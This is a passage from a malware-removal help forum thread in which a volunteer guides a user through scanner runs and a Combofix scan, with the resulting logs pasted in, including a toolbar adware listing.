18:05:05.0933 5600 swprv - ok
18:05:05.0963 5600 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
18:05:05.0973 5600 Symc8xx - ok
18:05:06.0003 5600 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
18:05:06.0013 5600 Sym_hi - ok
18:05:06.0033 5600 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
18:05:06.0044 5600 Sym_u3 - ok
18:05:06.0093 5600 [ 0E8676FB3BB95AA40FDF7A4A31018C8B ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
18:05:06.0158 5600 SynTP - ok
18:05:06.0217 5600 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
18:05:06.0256 5600 SysMain - ok
18:05:06.0279 5600 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
18:05:06.0298 5600 TabletInputService - ok
18:05:06.0324 5600 [ FD90A16CEB10D4FDAA00AAF39B8FF58F ] taphss C:\Windows\system32\DRIVERS\taphss.sys
18:05:06.0336 5600 taphss - ok
18:05:06.0372 5600 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
18:05:06.0401 5600 TapiSrv - ok
18:05:06.0436 5600 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
18:05:06.0466 5600 TBS - ok
18:05:06.0526 5600 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
18:05:06.0561 5600 Tcpip - ok
18:05:06.0579 5600 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
18:05:06.0660 5600 Tcpip6 - ok
18:05:06.0690 5600 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
18:05:06.0716 5600 tcpipreg - ok
18:05:06.0743 5600 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
18:05:06.0769 5600 TDPIPE - ok
18:05:06.0829 5600 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
18:05:06.0855 5600 TDTCP - ok
18:05:06.0893 5600 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
18:05:06.0915 5600 tdx - ok
18:05:07.0127 5600 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
18:05:07.0811 5600 TeamViewer8 - ok
18:05:07.0857 5600 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
18:05:07.0873 5600 TermDD - ok
18:05:07.0904 5600 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
18:05:07.0935 5600 TermService - ok
18:05:07.0951 5600 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
18:05:07.0982 5600 Themes - ok
18:05:07.0998 5600 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
18:05:08.0018 5600 THREADORDER - ok
18:05:08.0038 5600 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
18:05:08.0068 5600 TrkWks - ok
18:05:08.0098 5600 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
18:05:08.0118 5600 TrustedInstaller - ok
18:05:08.0148 5600 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
18:05:08.0178 5600 tssecsrv - ok
18:05:08.0198 5600 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
18:05:08.0228 5600 tunmp - ok
18:05:08.0238 5600 [ 300DB877AC094FEAB0BE7688C3454A9C ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
18:05:08.0258 5600 tunnel - ok
18:05:08.0288 5600 [ C3ADE15414120033A36C0F293D4A4121 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
18:05:08.0298 5600 uagp35 - ok
18:05:08.0328 5600 [ D9728AF68C4C7693CB100B8441CBDEC6 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
18:05:08.0358 5600 udfs - ok
18:05:08.0388 5600 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
18:05:08.0418 5600 UI0Detect - ok
18:05:08.0428 5600 [ 75E6890EBFCE0841D3291B02E7A8BDB0 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
18:05:08.0448 5600 uliagpkx - ok
18:05:08.0468 5600 [ 3CD4EA35A6221B85DCC25DAA46313F8D ] uliahci C:\Windows\system32\drivers\uliahci.sys
18:05:08.0488 5600 uliahci - ok
18:05:08.0498 5600 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
18:05:08.0508 5600 UlSata - ok
18:05:08.0528 5600 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
18:05:08.0538 5600 ulsata2 - ok
18:05:08.0568 5600 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
18:05:08.0588 5600 umbus - ok
18:05:08.0618 5600 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
18:05:08.0658 5600 upnphost - ok
18:05:08.0678 5600 [ EAFE1E00739AFE6C51487A050E772E17 ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys
18:05:08.0698 5600 USBAAPL - ok
18:05:08.0748 5600 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
18:05:08.0768 5600 usbccgp - ok
18:05:08.0808 5600 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
18:05:08.0858 5600 usbcir - ok
18:05:08.0868 5600 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
18:05:08.0888 5600 usbehci - ok
18:05:08.0918 5600 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
18:05:08.0938 5600 usbhub - ok
18:05:08.0968 5600 [ 38DBC7DD6CC5A72011F187425384388B ] usbohci C:\Windows\system32\drivers\usbohci.sys
18:05:09.0008 5600 usbohci - ok
18:05:09.0038 5600 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
18:05:09.0068 5600 usbprint - ok
18:05:09.0083 5600 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
18:05:09.0102 5600 usbscan - ok
18:05:09.0125 5600 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
18:05:09.0146 5600 USBSTOR - ok
18:05:09.0174 5600 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
18:05:09.0195 5600 usbuhci - ok
18:05:09.0222 5600 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
18:05:09.0248 5600 usbvideo - ok
18:05:09.0273 5600 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll
18:05:09.0296 5600 UxSms - ok
18:05:09.0335 5600 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe
18:05:09.0365 5600 vds - ok
18:05:09.0396 5600 [ 7D92BE0028ECDEDEC74617009084B5EF ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
18:05:09.0443 5600 vga - ok
18:05:09.0468 5600 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
18:05:09.0496 5600 VgaSave - ok
18:05:09.0507 5600 [ 045D9961E591CF0674A920B6BA3BA5CB ] viaagp C:\Windows\system32\drivers\viaagp.sys
18:05:09.0521 5600 viaagp - ok
18:05:09.0533 5600 [ 56A4DE5F02F2E88182B0981119B4DD98 ] ViaC7 C:\Windows\system32\drivers\viac7.sys
18:05:09.0579 5600 ViaC7 - ok
18:05:09.0600 5600 [ FD2E3175FCADA350C7AB4521DCA187EC ] viaide C:\Windows\system32\drivers\viaide.sys
18:05:09.0614 5600 viaide - ok
18:05:09.0635 5600 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
18:05:09.0648 5600 volmgr - ok
18:05:09.0679 5600 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
18:05:09.0697 5600 volmgrx - ok
18:05:09.0732 5600 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys
18:05:09.0751 5600 volsnap - ok
18:05:09.0777 5600 [ D984439746D42B30FC65A4C3546C6829 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
18:05:09.0790 5600 vsmraid - ok
18:05:09.0843 5600 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe
18:05:09.0886 5600 VSS - ok
18:05:09.0943 5600 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll
18:05:09.0974 5600 W32Time - ok
18:05:09.0993 5600 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
18:05:10.0057 5600 WacomPen - ok
18:05:10.0088 5600 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
18:05:10.0089 5600 Wanarp - ok
18:05:10.0120 5600 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
18:05:10.0136 5600 Wanarpv6 - ok
18:05:10.0167 5600 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll
18:05:10.0198 5600 wcncsvc - ok
18:05:10.0230 5600 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
18:05:10.0245 5600 WcsPlugInService - ok
18:05:13.0051 5600 ============================================================
18:05:13.0051 5600 Scan finished
18:05:13.0051 5600 ============================================================
18:05:13.0062 5928 Detected object count: 0
18:05:13.0062 5928 Actual detected object count: 0

19.02.2013, 18:07   #12
markusg
/// Malware-holic

Very good.
Scan with Combofix
WARNING to READERS following along:
Combofix should only be run when a team member has instructed you to do so!

Please download Combofix from the following download mirror: Link
  • IMPORTANT: Save Combofix to your desktop.
  • Please disable all of your antivirus software as well as any malware/spyware scanners. These can interfere with Combofix while it works. Combofix sometimes still complains anyway; you can ignore that, but please let me know.
  • Start Combofix.exe and follow the on-screen instructions.
  • While Combofix is running, please do not work on the computer, move the mouse, or click in the Combofix window!
  • When Combofix has finished, it will create a log file.
  • Please post C:\Combofix.txt in your next reply (in CODE tags if possible).
Note: If you get the following error message after the restart
Illegal operation attempted on a registry key that has been marked for deletion.
simply restart the computer. This should fix the problem.

__________________
-Please forward suspicious mails to us for analysis:
markusg.trojaner-board@web.de
Instructions:
http://markusg.trojaner-board.de
For now, please send mails as described in the instructions above to
markusg.trojaner-board@web.de
If you would like to support us

19.02.2013, 18:41   #13
martinbu

Unfortunately, I don't think that worked the way it should have. The program shows me for about a minute that it is scanning. After that I get this bluescreen: hxxp://www.fotos-hochladen.net/uploads/fr52size1024oy5w3knrm2.jpg

The computer is then restarted, and the following error message appears: hxxp://www.fotos-hochladen.net/uploads/fr53size1024aftzce0bx5.jpg

19.02.2013, 18:59   #14
markusg
/// Malware-holic

Restart, press F8, and select Safe Mode. Log in to your account.
Start Combofix again, save the log, and go back to normal mode. Then post it.

19.02.2013, 19:39   #15
martinbu

That worked without any problems now. Here is the log file:

Combofix Logfile:
Code:
ComboFix 13-02-18.02 - TuS 19.02.2013  19:23:12.1.2 - x86 NETWORK
Microsoft® Windows Vista™ Home Basic   6.0.6002.2.1252.49.1031.18.1976.1552 [GMT 1:00]
ausgeführt von:: c:\users\TuS\Desktop\ComboFix.exe
AV: Avira Desktop *Enabled/Updated* {F67B4DE5-C0B4-6C3F-0EFF-6C83BD5D0C2C}
SP: Avira Desktop *Enabled/Updated* {4D1AAC01-E68E-63B1-344F-57F1C6DA4691}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\ntuser.dat
c:\windows\unin0407.exe
G:\Autorun.inf
.
.
(((((((((((((((((((((((   Dateien erstellt von 2013-01-19 bis 2013-02-19  ))))))))))))))))))))))))))))))
.
.
2013-02-19 18:29 . 2013-02-19 18:29	--------	d-----w-	c:\users\TuS\AppData\Local\temp
2013-02-19 18:29 . 2013-02-19 18:29	--------	d-----w-	c:\users\Default\AppData\Local\temp
2013-02-19 14:17 . 2013-01-08 04:57	6991832	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{6D45505C-6106-4259-9FB1-03C54D00EBCA}\mpengine.dll
2013-02-19 09:35 . 2013-02-19 09:35	--------	d-----w-	c:\windows\system32\IO
2013-02-18 21:34 . 2013-02-18 21:57	--------	d-----w-	c:\users\TuS\AppData\Roaming\Notepad++
2013-02-18 21:34 . 2013-02-18 21:35	--------	d-----w-	c:\program files\Notepad++
2013-02-15 08:20 . 2013-01-04 01:38	2048512	----a-w-	c:\windows\system32\win32k.sys
2013-02-15 08:20 . 2012-11-08 03:48	1314816	----a-w-	c:\windows\system32\quartz.dll
2013-02-15 08:20 . 2013-01-04 11:28	905576	----a-w-	c:\windows\system32\drivers\tcpip.sys
2013-02-15 08:20 . 2013-01-05 05:26	3550072	----a-w-	c:\windows\system32\ntoskrnl.exe
2013-02-15 08:20 . 2013-01-05 05:26	3602808	----a-w-	c:\windows\system32\ntkrnlpa.exe
2013-01-29 18:19 . 2013-01-29 18:19	--------	d-----w-	c:\program files\MP3Gain
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin7.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin6.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2013-01-24 19:59 . 2013-01-24 20:00	--------	d-----w-	c:\program files\QuickTime
2013-01-24 17:46 . 2013-01-24 17:46	--------	d-----w-	c:\users\TuS\AppData\Roaming\Malwarebytes
2013-01-24 17:45 . 2013-01-24 17:45	--------	d-----w-	c:\programdata\Malwarebytes
.
.
.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2013-02-08 15:58 . 2012-06-10 18:25	697712	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2013-02-08 15:58 . 2011-06-09 19:25	74096	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2013-01-17 00:28 . 2011-02-19 11:29	232336	------w-	c:\windows\system32\MpSigStub.exe
2012-12-22 15:58 . 2012-12-22 15:59	93640	----a-w-	c:\windows\system32\WindowsAccessBridge.dll
2012-12-22 15:58 . 2012-09-03 12:56	859072	----a-w-	c:\windows\system32\npdeployJava1.dll
2012-12-22 15:58 . 2011-06-09 19:13	779704	----a-w-	c:\windows\system32\deployJava1.dll
2012-12-16 13:12 . 2012-12-22 11:13	34304	----a-w-	c:\windows\system32\atmlib.dll
2012-12-16 10:50 . 2012-12-22 11:13	293376	----a-w-	c:\windows\system32\atmfd.dll
2013-02-08 15:40 . 2013-02-08 15:39	262552	----a-w-	c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RocketDock"="c:\program files\RocketDock\RocketDock.exe" [2007-09-02 495616]
"WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2008-01-19 202240]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-11-06 150040]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-11-06 178712]
"Persistence"="c:\windows\system32\igfxpers.exe" [2008-11-06 154136]
"WirelessAssistant"="c:\program files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe" [2009-09-01 499768]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2010-06-04 1791272]
"HP Software Update"="c:\program files\Hp\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"SoundMAXPnP"="c:\program files\Analog Devices\Core\smax4pnp.exe" [2008-12-11 1310720]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2012-12-03 946352]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2012-08-08 348664]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-10-11 59280]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-06-07 421776]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2012-10-25 421888]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Microsoft Office.lnk - c:\program files\Microsoft Office\Office\OSA9.EXE [1999-2-17 65588]
Mozilla Thunderbird.lnk - c:\program files\Mozilla Thunderbird\thunderbird.exe [2013-1-9 389168]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - ECACHE
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceNoNetwork	REG_MULTI_SZ   	PLA DPS BFE mpssvc
bthsvcs	REG_MULTI_SZ   	BthServ
LocalServiceAndNoImpersonation	REG_MULTI_SZ   	FontCache
.
Inhalt des "geplante Tasks" Ordners
.
2013-02-19 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-06-10 15:58]
.
.
------- Zusätzlicher Suchlauf -------
.
mStart Page = about:blank
uInternet Settings,ProxyOverride = *.local
TCP: DhcpNameServer = 192.168.2.1
FF - ProfilePath - c:\users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.de/
FF - ExtSQL: 2013-02-12 13:59; FirefoxToolbar@gutscheindoktor.de; c:\users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\FirefoxToolbar@gutscheindoktor.de.xpi
FF - ExtSQL: !HIDDEN! 2011-02-20 13:50; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF - user.js: extensions.BabylonToolbar.tlbrSrchUrl - hxxp://search.babylon.com/?babsrc=TB_def&mntrId=5fb987f200000000000000ffbeb5fb91&q=
FF - user.js: extensions.BabylonToolbar.id - 5fb987f200000000000000ffbeb5fb91
FF - user.js: extensions.BabylonToolbar.appId - {BDB69379-802F-4eaf-B541-F8DE92DD98DB}
FF - user.js: extensions.BabylonToolbar.instlDay - 15674
FF - user.js: extensions.BabylonToolbar.vrsn - 1.8.3.8
FF - user.js: extensions.BabylonToolbar.vrsni - 1.8.3.8
FF - user.js: extensions.BabylonToolbar_i.vrsnTs - 1.8.3.814:56
FF - user.js: extensions.BabylonToolbar.prtnrId - babylon
FF - user.js: extensions.BabylonToolbar.prdct - BabylonToolbar
FF - user.js: extensions.BabylonToolbar.aflt - babsst
FF - user.js: extensions.BabylonToolbar_i.smplGrp - none
FF - user.js: extensions.BabylonToolbar.tlbrId - irhnew
FF - user.js: extensions.BabylonToolbar.instlRef - sst
FF - user.js: extensions.BabylonToolbar.dfltLng - en
FF - user.js: extensions.BabylonToolbar.excTlbr - false
FF - user.js: extensions.BabylonToolbar.admin - false
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
URLSearchHooks-{7e111a5c-3d11-4f56-9463-5310c3c69025} - (no file)
SafeBoot-WudfPf
SafeBoot-WudfRd
AddRemove-Agere Systems Soft Modem - c:\windows\agrsmdel
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, hxxp://www.gmer.net
Rootkit scan 2013-02-19 19:29
Windows 6.0.6002 Service Pack 2 NTFS
.
Scanne versteckte Prozesse... 
.
Scanne versteckte Autostarteinträge... 
.
Scanne versteckte Dateien... 
.
Scan erfolgreich abgeschlossen
versteckte Dateien: 0
.
**************************************************************************
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
Zeit der Fertigstellung: 2013-02-19  19:31:47
ComboFix-quarantined-files.txt  2013-02-19 18:31
.
Vor Suchlauf: 10 Verzeichnis(se), 185.801.080.832 Bytes frei
Nach Suchlauf: 17 Verzeichnis(se), 185.690.263.552 Bytes frei
.
- - End Of File - - 444DFE3E87C0896BC43D3104E2BCE9D1
         